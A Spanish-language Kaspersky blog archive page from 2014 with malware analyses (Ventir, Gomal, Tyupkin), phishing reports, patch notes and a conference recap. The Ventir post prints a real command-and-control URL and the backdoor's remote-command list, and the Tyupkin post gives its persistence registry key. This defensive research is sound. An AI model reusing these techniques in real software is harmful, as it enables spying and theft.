Todas las amenazas

Virus

Hackers

Spam

Todo el sitio    Sólo virus
  
Enciclopedia de virus
Alertas
Análisis
Noticias
Glosario
Bitácora

 
Archivo

<< 2014  
ene feb mar
abr may jun
jul ago sep
oct    
Sobre los autores de la bitácora del analista antivirus
About Diary's Authors

La bitácora del analista antivirus es un weblog mantenido por los analistas antivirus de Kaspersky Lab, encabezado por Eugene Kaspersky. Lea más sobre los autores de esta bitácora

 

  Home / Bitácora

Bitácora del analista antivirus

Deja tus contraseñas al salir


  Dmitry Bestúzhev       24 octubre 2014 | 14:55  MSK

Comentar  

Los hoteles, restaurantes y aeropuertos solían ofrecer a sus clientes tabletas gratuitas mientras hacían uso de sus instalaciones. Hace poco asistí a una conferencia y me aloje en uno de estos hoteles, y tuve la oportunidad de tener a mi disposición un iPad gratuito especialmente instalado en mi habitación.

Me sorprendió que no sólo contuviera la agenda de la conferencia y contara con una conexión WiFi gratuita, sino que también incluyera bastante información personal sobre los anteriores huéspedes que ocuparon la misma habitación.

Cuando digo información personal, quiero decir cuentas con contraseñas pre guardadas, sesiones autorizadas en redes sociales, resultados de búsqueda del navegador (por lo general, contenidos pornográficos), contactos automáticamente guardados en la guía de direcciones, iMessages, e incluso un calculador de embarazos con información real. No fue difícil dar con la identidad de la mujer que lo utilizó, ya que también había dejado sus datos personales de contacto en el dispositivo:

















Con los nombres completos y direcciones de correo guardadas en el dispositivo, no fue difícil buscar en Google un poco para encontrar que algunos usuarios eran personajes reconocidos que trabajaban para el gobierno del país que yo estaba visitando.

La mayor parte de las sesiones seguían abiertas, e incluso era posible publicar entradas / enviar mensajes en nombre del usuario:

Esto es completamente inaceptable desde el punto de vista de la seguridad. Un atacante potencial podría no sólo leer los mensajes enviados y recibidos, sino que podría hacerse pasar por la víctima y enviar mensajes en su nombre.

También me parece que se trata de un perfecto recopilador de datos personales para campañas spear phishing dirigidas contra personajes de alto perfil. Por otra parte, si el atacante potencial se tratara de un ciberdelincuente, podría llegar a chantajear a sus víctimas. Además, esto le sería extremadamente fácil, ya que contaría con todo tipo de información sobre las víctimas, incluyendo los títulos de las películas pornográficas que vieron en fechas y horas específicas. Tomando en cuenta que algunas de las víctimas potenciales son personajes públicos y funcionarios gubernamentales, es muy probable que dicho chantaje tuviera éxito.

Entonces, ¿qué está mal? Bueno, diría que todo. Primero, es imprudente utilizar un dispositivo público gratuito para comunicaciones privadas y personales. El dispositivo podría estar infectado con puertas traseras y no se sabe quién podría estar detrás de esta hospitalidad. Segundo, si un establecimiento público desea ofrecer a sus clientes dispositivos portátiles gratuitos durante su estancia, es importante que éstos se configuren adecuadamente primero y aplicar políticas de seguridad elementales, como no guardar información personal, ni contraseñas ni otros datos privados.

Quizás estoy siendo muy receloso, pero ante el hecho de tener un dispositivo desconocido y sospechoso, como una tableta, en mi habitación, que además está equipado con una cámara y un micrófono, prefiero apagarlo y guardarlo dentro de un cajón. Tuve que hacer esto cada tarde, ya que el personal de limpieza volvía a colocarlo en la mesa cada día que permanecí en el hotel.

Asimismo, es importante recordar que, aunque un dispositivo gratuito esté configurado adecuadamente y al parecer no guarde ningún dato personal, no podemos descartar que el próximo huésped sea un experto en análisis forense, en cuyo caso podría tomar una imagen de todo el dispositivo para después recuperar los datos personales guardados.

Sígueme en twitter: @dimitribest

Una falsa elección: ¿el virus Ébola o virus informático?


  Tatyana Shcherbakova       24 octubre 2014 | 13:25  MSK

Comentar  

En septiembre nos encontramos con las noticias sobre víctimas del virus Ébola en África y con invitaciones inusuales a una conferencia de la Organización Mundial de la Salud (OMS) en el campo Asunto de los mensajes de correo “nigerianos”. El objetivo de estos mensajes era, como de costumbre, sonsacarles su dinero a los desprevenidos destinatarios que entablaban correspondencia con los autores de las cartas.

En octubre les tocó el turno a los ciberdelincuentes que se aprovecharon del tumulto provocado por el virus Ébola para enviar mensajes que contenían programas maliciosos. Una vez más, la OMS aparecía como el remitente de estos mensajes, lo que no resulta sorprendente, ya que esta es la organización que se encarga de lidiar con las diferentes enfermedades y epidemias alrededor de todo el mundo.

En el texto de los mensajes, detectamos que los ciberpiratas intentaban convencer a los destinatarios de que la OMS había preparado un archivo con información general y medidas de seguridad para ayudar a protegerse a los destinatarios y sus allegados contra este mortal virus y otras enfermedades. Además, les pedían que hicieran circular esta información para colaborar con la OMS.

A false choice: the Ebola virus or malware?

Para camuflar el enlace verdadero, se utilizó un servicio de abreviación de enlaces, que finalmente desviaba a los usuarios hacia un popular servicio de almacenamiento de datos en la nube, donde los ciberdelincuentes habían almacenado el programa malicioso Backdoor.Win32.DarkKomet.dtzn, disimulado como un documento de la OMS. Este malware está diseñado para robar datos personales. Notamos que los administradores del servicio bloquearon rápidamente el acceso al archivo y, quizás por esta razón, los ciberpiratas decidieron modificar su carta. Al día siguiente, nuestras trampas capturaron otro mensaje similar supuestamente enviado por la OMS, sólo que esta vez el archivo comprimido que contenía el mismo malware estaba incrustado en el mensaje mismo.

A false choice: the Ebola virus or malware?

Los ciberpiratas no suelen perderse la oportunidad de aprovecharse de los acontecimientos en boga y de los nombres de organizaciones reconocidas para engañar a los destinatarios de sus mensajes spam. Y es así que dejándose engañar por el convincente encabezado y sin prestar la más mínima atención, los descuidados usuarios ponen en riesgo su información personal y permiten que los ciberpiratas tomen el control de sus equipos. Vale la pena recordar que a pesar de la protección que ofrecen las soluciones antivirus modernas, sólo las acciones cuidadosas de los usuarios podrán mantener a salvo sus datos confidenciales.


El troyano Ventir: arma tu propio espía para MacOS


  16 octubre 2014 | 18:00  MSK

Comentar  

Hace poco tiempo nos llegó para su análisis un interesante fichero (MD5 9283c61f8cce4258c8111aaf098d21ee), que resultó ser un programa malicioso multimodular para MacOS X. Ya desde los resultados del estudio preliminar quedó claro queš no hacía nada bueno: un fichero mach de 64 bits común y corriente contenía en su sección de datos muchos otros ficheros mach, uno de los cuales se instalaba en el sector de ejecución automática, como es típico de los troyanos-droppers.

La investigación posterior mostró que dentro del programa malicioso se escondían un backdoor, un keylogger y un troyano-espía. Y lo más interesante es que el keylogger usaba una extensión del núcleo (kext) con código fuente abierto, que está a la disposición de todos, por ejemplo, en GitHub.

En este momento, los productos de Kaspersky Lab detectan los ficheros descubiertos como: Trojan-Dropper.OSX.Ventir.a, Backdoor.OSX.Ventir.a, Trojan-Spy.OSX.Ventir.a y not-a-virus:Monitor.OSX.LogKext.c, dependiendo de cuáles son sus objetivos.

Fichero fuente (Trojan-Dropper.OSX.Ventir.a)

Nada más ejecutarse, el dropper comprueba que tiene privilegios de superusuario mediante la función geteuid(). Del resultado de la prueba dependerá dónde se instalarán los ficheros del troyano:

  • Si tiene privilegios de superusuario, los ficheros se instalan en /Library/.local y /Library/LaunchDaemons;
  • Si no los tiene, los ficheros se instalan en ~/Library/.local y ~/Library/LaunchAgents (el carácter “~” representa la ruta a la carpeta del usuario activo).

Todos los ficheros del troyano destinados a cargarse en el equipo infectado se encuentran desde el principio en la sección “__data” del fichero-dropper.

Ubicación de los ficheros del troyano dentro del dropper

Al final, se instalan en el sistema infectado los siguientes ficheros:

  1. Library/.local/updated, que lanza de nuevo los ficheros updated y EventMonitor si por algún motivo se han dejado de ejecutar.
  2. Library/.local/reweb, que sirve para reiniciar el fichero updated.
  3. Library/.local/update, un módulo de backdoor.
  4. Library/.local/libweb.db, el fichero de base de datos del programa malicioso. Contiene la configuración global del troyano, por ejemplo, la dirección del servidor de administración.
  5. Library/LaunchAgents (o LaunchDaemons)/com.updated.launchagent.plist, un fichero de características que se usa para instalar el fichero Library/.local/updated en la ejecución automática mediante el daemon launchd.
  6. Dependiendo de la presencia de privilegios de superusuario:

    A) si los tiene, lo hace en /Library/.local/kext.tar. A continuación, el archivo se descomprime a sí mismo, extrayendo los siguientes ficheros:

    • updated.kext, el driver que intercepta las teclas que pulsa el usuario;
    • Keymap.plist, un mapa de las correspondencias entre teclas y sus valores;
    • EventMonitor, un agente que lleva un registro de las teclas pulsadas, así como los eventos del sistema, anotándolos en el fichero Library/.local/.logfile.

    B) si no los tiene, lo hace en ~/Library/.local/EventMonitor. Es un agente que hace un seguimiento del nombre de la ventana activa y de las pulsaciones, y las anota en el fichero Library/.local/.logfile.

Después de instalar estosos ficheros, el troyano instala en la ejecución automática el fichero updated mediante el utilitario estándar de consola launchctl (usando la instrucción launchctl load %s/com.updated.launchagent.plist).

Luego, si tiene privilegios de superusuario, el dropper carga un driver que hace logs en el núcleo mediante el utilitario estándar de OSX kextload (usando la instrucción kextload /System/Library/Extensions/updated.kext).

A continuación Trojan-Dropper.OSX.Ventir.a ejecuta el fichero reweb y se autoelimina del sistema.

Ficheros updated y reweb

El fichero updated elimina todos los procesos que tengan el nombre reweb (instrucción killall -9 reweb). Más adelante verifica periódicamente si se están ejecutando los procesos EventMonitor y update, y en caso de necesidad, los vuelve a lanzar.

El fichero reweb termina todos los procesos que tengan los nombres updated y update, después de lo cual ejecuta el fichero Library/.local/updated.

El fichero update (Backdoor.OSX.Ventir.a)

Al iniciar su trabajo el backdoor distribuye los valores de los campos de la tabla config de la base de datos libweb.db entre las variables locales para su posterior uso.

Para obtener instrucciones usa una solicitud HTTP GET similar a: http://220.175.13.250:82/macsql.php?mode=getcmd&key=1000&udid=000C29174BA0

donde key es cierta clave almacenada en libweb.db en la tabla config; udid, la dirección MAC y 220.175.13.250:82 la dirección IP y el puerto del servidor de administración.

Esta solicitud se envía a intervalos cortos en un ciclo constante e ininterrumpido.

El backdoor puede procesar las siguientes instrucciones del servidor de administración:

  • reboot, reiniciar el equipo;
  • restart, reiniciar el backdoor mediante la ejecución del fichero reweb;
  • uninstall, eliminación total del backdoor del sistema.
  • show config, enviar datos de la tabla config al servidor de administración;
  • down exec, actualizar el fichero update, descargarlo desde el servidor de administración;
  • down config, actualizar el fichero de configuración libweb.db, descargarlo desde el servidor de administración;
  • upload config, enviar el fichero libweb.db al servidor de administración;
  • update config:[parámetros], actualizar la tabla config en el fichero de la base de datos libweb.db, en los parámetros se envían los valores de los campos de la tabla;
  • executeCMD: [parámetro], ejecutar la instrucción indicada en el parámetro mediante la función popen(cmd, “r”), enviar los resultados de la instrucción al servidor de administración;
  • executeSYS: [parámetro], ejecutar la instrucción indicada en el parámetro mediante la función system(cmd);
  • executePATH:[parámetro], ejecutar un fichero del directorio Library/.local, el nombre del fichero se envía en el parámetro;
  • uploadfrompath: [parámetro], descargar un fichero con el nombre indicado en el parámetro desde el directorio Library/.local/ al servidor de administración;
  • downfile: [parámetros], descargar un fichero que tenga el nombre indicado en el parámetro desde el servidor de administración y guardarlo en la ruta indicada en el parámetro.

Parte de las instrucciones procesadas por el módulo backdoor.

Fichero EventMonitor (Trojan-Spy.OSX.Ventir.a)

Este fichero se carga al sistema si el dropper no consigue obtener los derechos de superusuario. Después de lanzarse, Trojan-Spy.OSX.Ventir.a instala su procesador de eventos del sistema con la ayuda de la función API Carbon Event Manager. Este nuevo procesador intercepta los eventos relacionados con la pulsación de teclas y los anota en un registro en el fichero ~/Library/.local/.logfile. Los botones modificadores (como por ejemplo shift) se anotan en el registro de la siguiente manera: [command],š [option],š [ctrl], [fn], [ESC], [tab], [backspace], etc.

Procesador de las pulsaciones del teclado

También, justo antes de procesar la pulsación de una tecla, determina el nombre del proceso cuya ventana está activa en ese momento. Para este fin se usan las funciones GetFrontProcess y CopyProcessName de Carbon API. El nombre del proceso también se anota en el registro de la siguiente manera: [La aplicación {nombre del proceso} está en la ventana frontal]. Gracias a esto, el dueño del troyano puede determinar en qué aplicación se ha introducido la frase registrada.

Fichero kext.tar (not-a-virus:Monitor.OSX.LogKext.c)

Como ya hemos dicho, el archivo kext.tar se carga en el equipo infectado si el troyano Trojan-Dropper.OSX.Ventir ha logrado obtener privilegios de superusuario. En el archivo hay tres ficheros:

  • updated.kext
  • EventMonitor
  • Keymap.plist

El paquete de software updated.kext es una extensión del núcleo (kext) de código fuente abierto y está destinado a interceptar las pulsaciones de teclas. Nuestros productos detectan esta extensión desde hace mucho tiempo como not-a-virus:Monitor.OSX.LogKext.c y su código fuente (como ya hemos dicho) en este momento está a disposición del público en general.

El fichero Keymap.plist es un mapa de las correspondencias entre teclas y sus valores. El fichero EventMonitor lo usa para determinar los valores de las teclas usando los códigos correspondientes, que le transmite el fichero updated.kext.

El fichero EventMonitor es un fichero-agente que recibe los datos provenientes de la extensión del núcleo updated.kext, los procesa y los anota en el fichero de registro /Library/.local/.logfile. He aquí, por ejemplo, una parte de este registro que contiene un login y una contraseña interceptadas por el troyano:

Como vemos en la captura de pantalla, tan pronto como la víctima usa el navegador para entrar en el sitio yandex.ru e introduce allí su login y contraseña de correo, estos datos ingresan al registro y de allí caen en manos de los delincuentes.

Esta amenaza adquiere particular vigencia con las fugas ocurridas de las bases de datos de logins y contraseñas de cuentas en Yandex, Mail.ru y Gmail. No podemos excluir la posibilidad de que los programas maliciosos de la familia Ventir hayan tenido que ver con lo sucedido con estas bases de datos.

Para concluir, merece la pena destacar que por su estructura multimodular el troyano Trojan-Dropper.OSX.Ventir.a nos recuerda al famoso Trojan.OSX.Morcut (también conocido como OSX/Crisis) que tenía aproximadamente la misma cantidad de módulos con nombres similares. El uso de software con código fuente abierto hace que para los delincuentes sea mucho más fácil crear nuevos programas maliciosos. De esta manera, podemos suponer que la cantidad de espías-troyanos no hará otra cosa que aumentar en el futuro.

Actualizaciones de seguridad de Microsoft, octubre de 2014


  Kurt Baumgartner       16 octubre 2014 | 13:13  MSK

Comentar  

Ayer debe haber sido el día en que más información se ha publicado en la historia de los martes de parches de Microsoft. El mes pasado indicamos que los cibercriminales responsables de Aurora Panda/DeputyDog habían dejado de tener control sobre una vulnerabilidad del día cero en IE que se estaba parchando, y eso nos pareció inusual. Este mes, se están parchando varias vulnerabilidades que los responsables de Amenazas Persistentes Avanzadas (APT) están abusando con exploits de día cero y se está indicando al público cuáles son las amenazas que las explotan. Ayer, Microsoft publicó ocho boletines de seguridad, de MS14-063 a MS14-063, tres de los cuales calificó como críticos.

Las más interesantes son las dos vulnerabilidades que se activan con funcionalidades de Windows pero se utilizan para lanzar ataques dirigidos de phishing, conocidos como “spearphishing”, con archivos adjuntos que se hacen pasar por documentos de Office: tablas de Excel, presentaciones de PowerPoint, documentos de Word, etc. La primera nos recuerda a los ataques de Duqu. MS14-058 parcha otra vulnerabilidad en el manejo de fuentes a nivel kernel, CVE-2014-4148, el mismo tipo de problema que se había visto en los exploits para lanzar los ataques spearhishing de Duqu. Microsoft ha calificado esta vulnerabilidad como crítica. Todavía no se ha vinculado a ningún actor específico con este ataque o exploit.

Para nuestra sorpresa, Microsoft calificó como “Importante" la vulnerabilidad de Windows OLE que se parchó con MS14-060. La APT conocida como “Sandworm team” desplegó CVE-2014-4114 junto con otros exploits en ataques contra blancos específicos. El grupo es conocido por propagar nuevas variantes del bot BlackEnergy en operaciones de ciberespionaje, que suelen estar dirigidas a entidades geopolíticas y militares. En un incidente, el equipo envió diapositivas de PowerPoint que contenían el exploit del día cero OLE en un ataque dirigido al gobierno de Ucrania y a organizaciones académicas estadounidenses. Cuando se abría el archivo, las diapositivas descargaban nuevas variantes de BlackEnergy a los sistemas de sus víctimas. Estas variantes mantienen características dedicadas a las tareas de ciberespionaje. Las características más interesantes de estos troyanos son sus complementos o módulos personalizados, pero profundizaremos en esto en otra entrada del blog.

Otro grupo, conocido como Hurricane Panda, trató de explotar CVE-2014-4113 en ataques dirigidos. Esta vulnerabilidad de elevación de privilegios puede ser un verdadero problema en situaciones en las que un atacante ha ingresado a una red y está intentando abrirse paso en su interior. La falla también existe en el código kernel de Windows y el boletín MS14-058 que mencionamos arriba también la parcha.

La actualización de Internet Explorer soluciona 14 vulnerabilidades, consideradas críticas para IE6 a IE11. Las vulnerabilidades no tienen ningún efecto sobre las instalaciones de Server Core.

Puedes leer más sobre los Boletines de Seguridad de Microsoft de octubre de 2014 aquí.

Tic Tac Toe retorcido


  Anton Kivva       10 octubre 2014 | 13:00  MSK

Comentar  

Son tan comunes los intentos de los ciberdelincuentes de camuflar sus programas maliciosos como aplicaciones útiles que hasta se han estereotipado. Sin embargo, los creadores de Gomal, un nuevo troyano móvil, no sólo han alcanzado un nuevo nivel de camuflaje al añadir el juego Tic Tac Toe a su programa malicioso, sino que también han implementado interesantes técnicas, novedosas para este tipo de malware.

Todo comenzó con un juego de Tic Tac Toe que nos enviaron para que lo analicemos. A primera vista, la aplicación parecía bastante inofensiva:

Tic Tac Toe retorcido

Sin embargo, la lista de permisos que el juego pedía levantó nuestras sospechas. ¿Para qué necesitaba acceder a Internet, los contactos archivo SMS del usuario, o procesar llamadas y grabar sonidos? Analizamos el ‘juego’ y resultó ser un programa spyware multipropósito. Los productos de Kaspersky Lab detectan esta aplicación maliciosa como Trojan-Spy.AndroidOS.Gomal.a.

Un detallado análisis del programa malicioso nos demostró que el código del juego apenas representa el 30% del tamaño del archivo ejecutable. El resto son funciones para espiar al usuario y robarle sus datos personales.

Tic Tac Toe retorcido

En verde, el código del juego; en rojo las funciones maliciosas remarcadas

¿De qué funciones se trata? Primero, el programa malicioso tiene funciones para grabar sonidos, lo que ahora es común en el spyware móvil:

Tic Tac Toe retorcido

También posee funciones para robar SMSs:

Tic Tac Toe retorcido

Además, el troyano recopila información sobre el dispositivo y envía todos los datos recopilados al servidor de su dueño. Pero Trojan-Spy.AndroidOS.Gomal.a oculta algo realmente curioso bajo la manga: un paquete de interesantes librerías que se distribuyen junto al programa malicioso.

Tic Tac Toe retorcido

El paquete incluye un exploit que sirve para obtener privilegios de raíz en el dispositivo Android. Los privilegios ampliados le dan a la aplicación acceso a varios servicios que Linux brinda (el sistema operativo en el que se basa Android), incluyendo la capacidad de leer registros de memoria y /maps.

Después de obtener el acceso de raíz, el troyano empieza a funcionar. Por ejemplo, roba mensajes de correo de Good for Enterprise, si es que la aplicación está instalada en el smartphone. Esta aplicación es conocida como un cliente seguro de correo para uso corporativo, de manera que si sufre el robo de datos, significaría graves problemas para la compañía en la que trabaja el dueño del dispositivo atacado. Para atacar a Good for Enterprise, el troyano usa la consola para obtener la ID de los procesos relevantes (comando ps) y lee el archivo virtualš /proc/<pid>/maps. El archivo contiene información sobre los bloques de memoria asignados a la aplicación.

Tic Tac Toe retorcido

Después de obtener la lista de los bloques de memoria, el programa malicioso encuentra el bloque [heap] que contiene la cadena de datos de la aplicación y crea su archivo de volcado usando otra librería de su paquete.

A continuación, este archivo de volcado se analiza en busca de firmas características de mensajes de correo, y los mensajes encontrados se envían al servidor de los ciberpiratas.

Gomal también roba datos de Logcat, el servicio de registro incorporado en Android y que se usa para depurar la aplicación. Muy a menudo, los desarrolladores hacen que sus aplicaciones muevan datos confidenciales a Logcat, incluso después del lanzamiento de las aplicaciones. Esto le permite al troyano robar incluso más datos confidenciales de otros programas.

En consecuencia, el aparentemente inofensivo juego Tic Tac Toe les permite a los ciberdelincuentes acceder a una gran cantidad de datos personales del usuario y datos corporativos que pertenecen a su compañía. Las técnicas que usa Gomal estaban en un principio implementadas en troyanos para Windows, pero ahora, como podemos ver, también lo están en programas maliciosos para Android. Y, lo que es más peligroso, los principios en los que se basa esta técnica pueden usarse para robar datos de otras aplicaciones además de Good for Enterprise; es posible que en un futuro próximo aparezcan programas maliciosos móviles diseñados para atacar a conocidos clientes de mensajes de correo, clientes de mensajes de texto, y a otros programas.

Complemento:

Trojan-Spy.AndroidOS.Gomal.a usa una versión antigua del exploit, que funciona en los dispositivos Samsung con versión del sistema operativo 4.0.4 y anteriores. Por lo tanto, en los dispositivos con nuevo firmware, los ataques lanzados con esta versión del malware contra los programas de correo corporativo no tendrán éxito.
Hasta el momento no hemos registrado intentos de infectar a nuestros usuarios con el troyano Gomal. A pesar de que este ejemplar todavía no está difundido en el mundo real, nuestros productos lo pueden detectar, para evitar en el futuro ataques de malware móvil que puedan crearse basándose en esta prueba de concepto.

Tyupkin: Un programa malicioso que manipula cajeros automáticos


  Global Research & Analysis Team (GReAT), Kaspersky Lab        7 octubre 2014 | 16:44  MSK

Comentar  

Hace algunos meses, a solicitud de una institución financiera, el Global Research and Analysis Team de Kaspersky Lab realizó una investigación forense sobre un ataque cibercriminal que afectaba a varios cajeros automáticos en Europa del Este.

Durante la investigación, descubrimos un programa malicioso que ayudaba a los atacantes a manipular de forma directa los cajeros automáticos para vaciar sus cartuchos de efectivo.

Cuando lo investigamos, el programa estaba activo en más de 50 cajeros automáticos de instituciones bancarias de Europa del Este.š ššLo que vimos al enviar los ejemplares a VirusTotal es que se había propagado hacia otros países, incluyendo Estados Unidos, India y China.

Debido a la naturaleza de los dispositivos en los que se ejecuta este programa, no tenemos datos de Kaspersky Security Network para determinar el alcance de la infección. Pero las estadísticas recolectadas por VirusTotal tienen registros del programa enviados desde los siguientes países:

Tyupkin:  Un programa malicioso que manipula cajeros automáticos

Tyupkin:  Un programa malicioso que manipula cajeros automáticos

Este nuevo programa, que Kaspersky Lab detecta como Backdoor.MSIL.Tyupkin, afecta a los cajeros automáticos de uno de los principales fabricantes que ejecutan Microsoft Windows 32-bit.

Tyupkin utiliza varias tácticas para mantenerse escurridizo y evitar que lo detecten. En primer lugar, sólo se activa en un momento específico de la noche. También utiliza una llave diferente que le entrega una fuente al azar en cada sesión. Sin ella, nadie puede interactuar con el cajero infectado.

Si la llave es la correcta, el programa muestra información sobre la cantidad de dinero guardada en cada cartucho y permite que un atacante con acceso físico al cajero retire 40 billetes del cartucho seleccionado.

La mayoría de las muestras que analizamos se compilaron en marzo de 2014. Pero el programa ha ido evolucionando con el tiempo. En su última variante (versión .d), implementa técnicas para evitar la depuración y la emulación y desactiva McAfee Solidcore del sistema infectado.

Análisis

Imágenes de las cámaras de seguridad de los cajeros automáticos mostraron que los atacantes pueden manipular el dispositivo e instalar el programa con un CD de arranque.

Los atacantes copiaron los siguientes archivos en el cajero:

C:\Windows\system32\ulssm.exe
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\AptraDebug.lnk

Después de revisar el entorno, el programa elimina el archivo .Ink y crea una llave en el registro:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
“AptraDebug” = “C:\Windows\system32\ulssm.exe”

Esto le permite interactuar con el cajero por medio de la biblioteca estándar MSXFS.dll -- Extension for Financial Services (XFS).

El programa se mantiene en un bucle infinito esperando a que el usuario actúe. šPara que sea más difícil de detectar, Tyupkin acepta (de forma predeterminada) instrucciones sólo los domingos y lunes en la noche.

Acepta los siguientes comandos:

  • XXXXXX – Muestra la ventana principal.
  • XXXXXX – Se elimina a sí mismo con un archivo de proceso por lotes.
  • XXXXXX – Aumenta el periodo de actividad del programa.
  • XXXXXX – Oculta la ventana principal.

Después de cada instrucción, el operador debe presionar "Aceptar" en el teclado del cajero.

Tyupkin también usa llaves de sesión para prevenir la interacción con usuarios elegidos al azar. šDespués de que se ingresa el comando para mostrar la ventana principal, el programa muestra un mensaje en inglés que dice "¡INGRESE LA LLAVE DE SESIÓN PARA PROCEDER!", con una fuente aleatoria en cada sesión.

El operador malicioso debe conocer el algoritmo para generar una llave de sesión basada en la fuente que se muestra. šEl criminal debe ingresar la llave correcta para interactuar con el cajero infectado.

Al hacerlo, el programa muestra el siguiente mensaje:

OPERACIÓN DE EFECTIVO PERMITIDA.
PARA INICIAR LA OPERACIÓN DE EXPEDICIÓN -
INGRESE EL NÚMERO DE CARTUCHO Y PRESIONE ACEPTAR.

Cuando el operador selecciona el número de cartucho, el cajero expende 40 billetes de ese cartucho.

Tyupkin:  Un programa malicioso que manipula cajeros automáticos

Si la llave de sesión que se ingresó es incorrecta, el programa desactiva la red local y muestra el mensaje:

DESACTIVANDO RED DE AREA LOCAL.....
POR FAVOR ESPERE.....

No sabemos por qué se desactiva la red local. Tal vez sea para demorar o perjudicar investigaciones remotas.

En el siguiente enlace puedes ver un vídeo con una demostración del ataque en un cajero automático real: http://youtu.be/QZvdPM_h2o8

Conclusión

Los últimos años hemos estado observado un gran aumento en los ataques a cajeros automáticos usando dispositivos para duplicar tarjetas y programas maliciosos. š Después de muchas denuncias de bancos de todo el mundo, se ha arrestado a los cibercriminales que duplican tarjetas.

Estos atacantes tuvieron éxito al robar los datos de las tarjetas de crédito cuando los clientes utilizan sus tarjetas en los cajeros automáticos de bancos y gasolineras, lo que aumentó el estado de alerta del público, que comenzó a tomar más precauciones al usar cajeros automáticos públicos.

Ahora estamos viendo la evolución natural de esta amenaza: los cibercriminales están subiendo la apuesta y atacando a las instituciones financieras de forma directa. š  Lo hacen infectando los cajeros de forma directa o lanzando amenazas persistentes avanzadas contra el banco. š El programa Tyupkin es un ejemplo de cómo los atacantes están aprovechando las debilidades en la infraestructura de los cajeros automáticos para llevar sus ataques a otro nivel.

El hecho de que muchos cajeros utilicen sistemas operativos con debilidades de seguridad conocidas y la ausencia de soluciones de seguridad son problemas mayores que deben abordarse con urgencia.

Recomendamos a los bancos que revisen la seguridad física de sus cajeros e inviertan en soluciones de seguridad de calidad.

Recomendaciones para mitigar los ataques

Recomendamos que las instituciones y compañías financieras que operen con cajeros automáticos en sus instalaciones consideren instaurar las siguientes guías de mitigación:

  • Revisar la seguridad física de sus cajeros e invertir en soluciones de seguridad de calidad.
  • Cambiar el candado superior y las llaves predeterminadas de todos los cajeros. Evitar usar las llaves maestras que entrega el fabricante.
  • Instalar y asegurase de que la alarma de seguridad del cajero automático funcione. Se observó que los cibercriminales de Tyupkin infectaron sólo los cajeros automáticos que no tenían instalada ninguna alarma de seguridad.
  • Puedes enviarnos un mensaje a intelreports@kaspersky.com si quieres recibir instrucciones para verificar en un sólo paso si tus cajeros automáticos están infectados. Para realizar un análisis completo del sistema del cajero automático y eliminar la puerta trasera, por favor utiliza la herramienta Kaspersky Virus Removal Tool (puedes descargarla aquí).

Consejos generales para los operadores de cajeros automáticos dentro de sus instalaciones

  • Asegúrate de que el cajero se encuentra en un lugar abierto, bien iluminado y vigilado por cámaras de seguridad visibles.  El cajero debe estar asegurado al suelo de una forma segura con un dispositivo anti-lazos que detenga a los criminales.
  • Revisa el cajero con regularidad para asegurarte de que no se haya anexado ningún dispositivo externo (como lectores de tarjetas).
  • Mantén los ojos abiertos para detectar ataques de ingeniería social de criminales que se hacen pasar por inspectores de alarmas de seguridad, cámaras de seguridad u otros dispositivos en las instalaciones.  
  • Toma en serio las alarmas de seguridad y responde notificando a las autoridades ante cualquier posible amenaza.
  • Considera la posibilidad de llenar el cajero automático con sólo la cantidad de efectivo suficiente para un día de actividad.
  • El siguiente enlace contiene más consejos para compañías y usuarios: http://www.link.co.uk/AboutLINK/site-owners/Pages/Security-for-ATMs.aspx.

Virus Bulletin 2014: nuevos tiempos, viejos retos


  Fabio        7 octubre 2014 | 16:21  MSK

Comentar  

La última semana de septiembre, la industria antimalware se reunió en una de las conferencias más antiguas y legendarias de seguridad informática del mundo: la versión 24 de la Conferencia Internacional Virus Bulletin (VB2014), que se realizó en la maravillosa ciudad de Seattle, Estados Unidos. Kaspersky Lab asistió para presentar y compartir una amplia gama de investigaciones en curso con la comunidad de seguridad.

El primer día de la conferencia nos demostraron una y otra vez que el sistema operativo Linux ha dejado de estar libre de malware. Tuvimos varias charlas que desmantelaban el mito, entre ellas "Todo sobre Ebury y CDorked” e “Infecciones del malware Apache en sistemas Linux: mordiendo la mano que nos alimenta”, que exploraron programas maliciosos poco tradicionales y cómo el servidor web Apache se encuentra en medio de este mundo *nix, convirtiéndose en una plataforma eficiente para lanzar ataques e infectar a clientes desprevenidos.

Mi colega Santiago Pontiroli hizo una presentación sobre la actual "bonanza de bitcoins" y cómo el cibercrimen está atacando cada vez más a las monedas virtuales y sus usuarios. Al compartir algunos de los ejemplares de malware para bitcoin y otras divisas alternativas, dimos a la audiencia un vistazo general de los beneficios de las criptomonedas para los países latinoamericanos y las razones que tienen los cibercriminales para atacar.

El broche de oro del primer día fue la presentación de Patrick Wardle que habló de los “Métodos de persistencia del malware en Mac OS X”, que nos recordó que no todo en el ecosistema del malware está en Microsoft.

Con tantas charlas interesantes para asistir en el segundo día, tomar la decisión correcta a veces era difícil. Jérôme Segura hizo una presentación muy interesante sobre las estafas de Asistencia Técnica, en las que demostró en detalle cómo se construye una trampa para atrapar a los estafadores y enfatizó la importancia de educar y concienciar al usuario sobre estas situaciones.

Yo hice una presentación de un año de investigación sobre los ataques contra "boletos", un viejo sistema de pagos que es muy popular en Brasil y funciona con documentos y códigos de barras impresos. La exposición mostraba cómo los delincuentes habían adaptado sus troyanos para cambiarlos, redirigiendo los pagos a sus propias cuentas y robando millones de dólares en el camino.

Cuando le tocó el turno a mi colega David Jacoby, hizo una presentación muy divertida e informativa sobre cómo hackeó su propia casa, explotando diferentes vulnerabilidades en dispositivos en red como televisores inteligentes, impresoras, almacenamientos NAS, etc. Para demostrar de un modo interactivo que exponer los dispositivos a ataques implicaría comprometer toda la red de una casa, animó la presentación con GIFs graciosas y, por si esto fuera poco, hizo las diapositivas a mano en Microsoft Paint.

Investigadores de seguridad de Microsoft hablaron sobre el análisis de malware para .NET en su investigación "Instrumentación dinámica de malware .NET para análisis automatizados y manuales”. Como los desarrolladores de malware dependen cada vez más de lenguajes de programación avanzados para sus creaciones maliciosas, las herramientas como las que se presentaron en esta charla son básicas para aquellos analistas que quieren perfeccionar sus estudios de aplicaciones maliciosas .NET.

La última presentación de Kaspersky fue de Vicente Díaz: “OPSEC para investigadores de seguridad”. Trabajar como investigador de seguridad en estos tiempos no es fácil, en especial porque ya no lidiamos sólo con cuestiones técnicas. Han aparecido muchos nuevos actores en el entorno de seguridad global de la actualidad: gobiernos, grandes compañías, grupos de cibercriminales y servicios de inteligencia. Eso pone a los investigadores en situaciones complicadas.

